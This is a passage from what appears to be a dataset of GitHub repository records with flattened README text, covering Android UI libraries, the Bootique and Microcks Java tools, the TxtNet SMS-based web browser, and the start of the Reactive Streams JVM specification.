setNoMore(final int res,OnNoMoreListener listener) -void setNoMore(final View view,OnNoMoreListener listener) -``` -when loading is finished(add null or empty or stop manually),it while show in the end. - -## BaseViewHolder\ -decoupling the ViewHolder and Adapter,new ViewHolder in Adapter and inflate view in ViewHolder. -Example: - -```java -public class PersonViewHolder extends BaseViewHolder { - private TextView mTv_name; - private SimpleDraweeView mImg_face; - private TextView mTv_sign; - - - public PersonViewHolder(ViewGroup parent) { - super(parent,R.layout.item_person); - mTv_name = $(R.id.person_name); - mTv_sign = $(R.id.person_sign); - mImg_face = $(R.id.person_face); - } - - @Override - public void setData(final Person person){ - mTv_name.setText(person.getName()); - mTv_sign.setText(person.getSign()); - mImg_face.setImageURI(Uri.parse(person.getFace())); - } -} - ------------------------------------------------------------------------ - -public class PersonAdapter extends RecyclerArrayAdapter { - public PersonAdapter(Context context) { - super(context); - } - - @Override - public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) { - return new PersonViewHolder(parent); - } -} -``` - -## Decoration -Now there are three commonly used decoration provide for you. -**DividerDecoration** -Usually used in LinearLayoutManager.add divider between items. -```java -DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0);//color & height & paddingLeft & paddingRight -itemDecoration.setDrawLastItem(true);//sometimes you don't want draw the divider for the last item,default is true. -itemDecoration.setDrawHeaderFooter(false);//whether draw divider for header and footer,default is false. -recyclerView.addItemDecoration(itemDecoration); -``` -this is the demo: - - - -**SpaceDecoration** -Usually used in GridLayoutManager and StaggeredGridLayoutManager.add space between items. -```java -SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this));//params is height -itemDecoration.setPaddingEdgeSide(true);//whether add space for left and right adge.default is true. -itemDecoration.setPaddingStart(true);//whether add top space for the first line item(exclude header).default is true. -itemDecoration.setPaddingHeaderFooter(false);//whether add space for header and footer.default is false. -recyclerView.addItemDecoration(itemDecoration); -``` -this is the demo: - - -**StickHeaderDecoration** -Group the items,add a GroupHeaderView for each group.The usage of StickyHeaderAdapter is the same with RecyclerView.Adapter. -this part is modified from [edubarr/header-decor](https://github.com/edubarr/header-decor) -```java -StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this)); -decoration.setIncludeHeader(false); -recyclerView.addItemDecoration(decoration); -``` -for example: - - -**for detail,see the demo** - -License -------- - - Copyright 2015 Jude - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - - - - -",0 -bootique/bootique,Bootique is a minimally opinionated platform for modern runnable Java apps.,2015-12-10T14:45:15Z,," - -[![build test deploy](https://github.com/bootique/bootique/workflows/build%20test%20deploy/badge.svg)](https://github.com/bootique/bootique/actions) -[![Maven Central](https://img.shields.io/maven-central/v/io.bootique/bootique.svg?colorB=brightgreen)](https://search.maven.org/artifact/io.bootique/bootique) - -Bootique is a [minimally opinionated](https://medium.com/@andrus_a/bootique-a-minimally-opinionated-platform-for-modern-java-apps-644194c23872#.odwmsbnbh) -java launcher and integration technology. It is intended for building container-less runnable Java applications. -With Bootique you can create REST services, webapps, jobs, DB migration tasks, etc. and run them as if they were -simple commands. No JavaEE container required! Among other things Bootique is an ideal platform for -Java [microservices](http://martinfowler.com/articles/microservices.html), as it allows you to create a fully-functional -app with minimal setup. - -Each Bootique app is a collection of modules interacting with each other via dependency injection. This GitHub project -provides Bootique core. Bootique team also develops a number of important modules. A full list is available -[here](http://bootique.io/docs/). - -## Quick Links - -* [WebSite](https://bootique.io) -* [Getting Started](https://bootique.io/docs/2.x/getting-started/) -* [Docs](https://bootique.io/docs/) - documentation collection for Bootique core and all standard - modules. - -## Support - -You have two options: -* [Open an issue](https://github.com/bootique/bootique/issues) on GitHub with a label of ""help wanted"" or ""question"" - (or ""bug"" if you think you found a bug). -* Post a question on the [Bootique forum](https://groups.google.com/forum/#!forum/bootique-user). - -## TL;DR - -For the impatient, here is how to get started with Bootique: - -* Declare the official module collection: -```xml - - - - io.bootique.bom - bootique-bom - 3.0-M4 - pom - import - - - -``` -* Include the modules that you need: -```xml - - - io.bootique.jersey - bootique-jersey - - - io.bootique.logback - bootique-logback - - -``` -* Write your app: -```java -package com.foo; - -import io.bootique.Bootique; - -public class Application { - public static void main(String[] args) { - Bootique - .app(args) - .autoLoadModules() - .exec() - .exit(); - } -} -``` -It has ```main()``` method, so you can run it! - -*For a more detailed tutorial proceed to [this link](https://bootique.io/docs/2.x/getting-started/).* - -## Upgrading - -See the ""maven-central"" badge above for the current production version of ```bootique-bom```. -When upgrading, don't forget to check [upgrade notes](https://github.com/bootique/bootique/blob/master/UPGRADE.md) -specific to your version. -",0 -microcks/microcks,Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀,2015-02-23T15:46:09Z,," - -[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) -[![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags) -[![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)]((https://search.maven.org/artifact/io.github.microcks/microcks)) -[![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0) -[![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/) - - -# Microcks - Kubernetes native tool for API Mocking & Testing - -Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds. - -It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI. - -## Getting Started - -* [Documentation](https://microcks.io/documentation/getting-started/) - -To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md). - -## Build Status - -The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) - -#### Sonarcloud Quality metrics - -[![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) - -## Versions - -Here are the naming conventions we're using for current releases, ongoing development maintenance activities. - -| Status | Version | Branch | Container images tags | -| ----------- |------------------|----------|----------------------------------| -| Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` | -| Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` | -| Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` | - - -## How to build Microcks - -The build instructions are available in the [contribution guide](CONTRIBUTING.md). - -## Thanks to community! - -[![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers) -[![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members) -",0 -hackware1993/MagicIndicator,"A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c",2016-06-26T08:20:43Z,,"# MagicIndicator - -A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip. - -[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine. - -**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort) - -[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator) -[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252) -[![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator) - -![magicindicaotor.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif) - -# Usage - -Simple steps, you can integrate **MagicIndicator**: - -1. checkout out **MagicIndicator**, which contains source code and demo -2. import module **magicindicator** and add dependency: - - ```groovy - implementation project(':magicindicator') - ``` - - **or** - - ```groovy - repositories { - ... - maven { - url ""https://jitpack.io"" - } - } - - dependencies { - ... - implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib - implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx - } - ``` - -3. add **MagicIndicator** to your layout xml: - - ```xml - - - - - - - - - ``` - -4. find **MagicIndicator** through code, initialize it: - - ```java - MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator); - CommonNavigator commonNavigator = new CommonNavigator(this); - commonNavigator.setAdapter(new CommonNavigatorAdapter() { - - @Override - public int getCount() { - return mTitleDataList == null ? 0 : mTitleDataList.size(); - } - - @Override - public IPagerTitleView getTitleView(Context context, final int index) { - ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context); - colorTransitionPagerTitleView.setNormalColor(Color.GRAY); - colorTransitionPagerTitleView.setSelectedColor(Color.BLACK); - colorTransitionPagerTitleView.setText(mTitleDataList.get(index)); - colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() { - @Override - public void onClick(View view) { - mViewPager.setCurrentItem(index); - } - }); - return colorTransitionPagerTitleView; - } - - @Override - public IPagerIndicator getIndicator(Context context) { - LinePagerIndicator indicator = new LinePagerIndicator(context); - indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT); - return indicator; - } - }); - magicIndicator.setNavigator(commonNavigator); - ``` - -5. work with ViewPager: - - ```java - ViewPagerHelper.bind(magicIndicator, mViewPager); - ``` - - **or** - - work with Fragment Container(switch Fragment by hide()、show()): - ```java - mFramentContainerHelper = new FragmentContainerHelper(magicIndicator); - - // ... - - mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switch Fragment - ``` - -# Extend - -**MagicIndicator** can be easily extended: - -1. implement **IPagerTitleView** to customize tab: - - ```java - public class MyPagerTitleView extends View implements IPagerTitleView { - - public MyPagerTitleView(Context context) { - super(context); - } - - @Override - public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) { - } - - @Override - public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) { - } - - @Override - public void onSelected(int index, int totalCount) { - } - - @Override - public void onDeselected(int index, int totalCount) { - } - } - ``` - -2. implement **IPagerIndicator** to customize indicator: - - ```java - public class MyPagerIndicator extends View implements IPagerIndicator { - - public MyPagerIndicator(Context context) { - super(context); - } - - @Override - public void onPageSelected(int position) { - } - - @Override - public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) { - } - - @Override - public void onPageScrollStateChanged(int state) { - } - - @Override - public void onPositionDataProvide(List dataList) { - } - } - ``` - -3. use **CommonPagerTitleView** to load custom layout xml. - -Now, enjoy yourself! - -See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext),more extensions adding... - -# Who developed? - -hackware1993@gmail.com - -cfb1993@163.com - -Q&A - -An intermittent perfectionist. - -Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator. - -订阅我的微信公众号以及时获取 MagicIndicator 的最新动态。后续也会分享一些高质量的、独特的、有思想的 Flutter 和 Android 技术文章。 - -![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true) - -# License - - ``` - MIT License - - Copyright (c) 2016 hackware1993 - - Permission is hereby granted, free of charge, to any person obtaining a copy - of this software and associated documentation files (the ""Software""), to deal - in the Software without restriction, including without limitation the rights - to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - copies of the Software, and to permit persons to whom the Software is - furnished to do so, subject to the following conditions: - - The above copyright notice and this permission notice shall be included in all - copies or substantial portions of the Software. - - THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. - ``` - -# More - -Have seen here, give a star?(都看到这儿了,何不给个...,哎,别走啊,star还没...) -",0 -lukeaschenbrenner/TxtNet-Browser,An app that lets you browse the web over SMS,2022-03-22T22:50:34Z,,"# TxtNet Browser -### Browse the Web over SMS, no WiFi or Mobile Data required! -

- -> **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️** - -TextNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium of transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)). - -In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks. - -## Download -### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon. -TxtNet Browser is currently compatible with Android 4.4-13+. - -## Running Server Instances (uptime not guaranteed) -| Country | Phone Number | Notes | -| :--- | :----: | :--- | -| United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) | -| | | | - -Let me know if you are interested in hosting a server instance for your area! - -> ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server! - -## How it works (client) - -This app uses a permission that allows a broadcast reciever to recieve and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions are compartamentalized to the server module. This ensures that unless the app is setup to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programatically sent to and recieved from a registered server phone number. -The app communicates with a ""server phone number"", which is a phone number controlled by a ""server host"" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any Javascript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying. - -Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient! - -#### Why encode the HTML in the first place? -SMS was created in 1984, and was created to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project. - -## Server Hosting -TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication. -To enable the background service, tap on the overflow menu and select ""TxtNet Server Hosting"". Once the necessary permissions are granted, you can press on the ""Start Service"" toggle to initialize a background service. -TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to. -Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter. -For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Skizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). - - -##### Desktop Server Installation (Deprecated) - - The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below: -1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts) -2. Create a Twilio application for the number. -3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application -4. Open the ngrok directory and run this command: `./ngrok tcp 5000` -5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the ""A Message Comes In"" section after selecting ""webhook"". For example: ""https://xyz.ngrok.io/receive_sms"" -6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using ""pip install x"" -7. Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py` -8. In the TxtNet Browser app, press the three dots and press ""Change Server Phone Number"". Enter in the phone number you purchased from Twilio and press OK! - - -## FAQ/Troubleshooting - -Bugs: -- Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it ""stalled"" while loading on large pages. As of now the only way to fix this is to wait! -- In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are recieved by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again. -- In Android 12 (or possibly a new version of Google Messages?), there is a new and ""improved"" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this ""feature"", you can silent message notifications from the server phone number. - - - - -## Screenshots (TxtNet 1.0) - - - - - - - - - - -
-
- -##### Demo (TxtNet 1.0) - -https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 - -> Demo video shown above - - -## Development - -### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app. -Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. - -## Future Impact -My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: -- Those in countries with a low median income and prohibitively expensive data plans -- Those who live under oppressive governments, with near impenetrable internet censorship - -If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! - -## License - -GPLv3 - See LICENSE.md - -## Credits - -Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! -My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). -In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app. -",0 -reactive-streams/reactive-streams-jvm,Reactive Streams Specification for the JVM,2014-02-28T13:16:15Z,,"# Reactive Streams # - -The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure. - -The latest release is available on Maven Central as - -```xml - - org.reactivestreams - reactive-streams - 1.0.4 - - - org.reactivestreams - reactive-streams-tck - 1.0.4 - test - -``` - -## Goals, Design and Scope ## - -Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine. - -The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation. - -It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application. - -It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed. - -In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that - - - process a potentially unbounded number of elements - - in sequence, - - asynchronously passing elements between components, - - with mandatory non-blocking backpressure. - -The Reactive Streams specification consists of the following parts: - -***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations. - -***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations. - -Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK. - -### API Components ### - -The API consists of the following components that are required to be provided by Reactive Stream implementations: - -1. Publisher -2. Subscriber -3. Subscription -4. Processor - -A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s). - -In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol: - -``` -onSubscribe onNext* (onError | onComplete)? -``` - -This means that `onSubscribe` is always signalled, -followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled. - -#### NOTES - -- The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt - -### Glossary - -| Term | Definition | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| Signal | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. | -| Demand | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. | -| Synchronous(ly) | Executes on the calling Thread. | -| Return normally | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.| -| Responsivity | Readiness/ability to respond. In this document used to indicate that the different components should not impair each others ability to respond. | -| Non-obstructing | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. | -| Terminal state | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.| -| NOP | Execution that has no detectable effect to the calling thread, and can as such safely be called any number of times.| -| Serial(ly) | In the context of a [Signal](#term_signal), non-overlapping. In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. | -| Thread-safe | Can be safely invoked synchronously, or asychronously, without requiring external synchronization to ensure program correctness. | - -### SPECIFICATION - -#### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java)) - -```java -public interface Publisher { - public void subscribe(Subscriber s); -} -```` - -| ID | Rule | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| 1 | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. | -| [:bulb:](#1.1 ""1.1 explained"") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* | -| 2 | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`. | -| [:bulb:](#1.2 ""1.2 explained"") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* | -| 3 | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). | -| [:bulb:](#1.3 ""1.3 explained"") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* | -| 4 | If a `Publisher` fails it MUST signal an `onError`. | -| [:bulb:](#1.4 ""1.4 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* | -| 5 | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. | -| [:bulb:](#1.5 ""1.5 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* | -| 6 | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. | -| [:bulb:](#1.6 ""1.6 explained"") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* | -| 7 | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. | -| [:bulb:](#1.7 ""1.7 explained"") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* | -| 8 | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. | -| [:bulb:](#1.8 ""1.8 explained"") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* | -| 9 | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). | -| [:bulb:](#1.9 ""1.9 explained"") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* | -| 10 | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. | -| [:bulb:](#1.10 ""1.10 explained"") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* | -| 11 | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. | -| [:bulb:](#1.11 ""1.11 explained"") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* | - -#### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java)) - -```java -public interface Subscriber { - public void onSubscribe(Subscription s); - public void onNext(T t); - public void 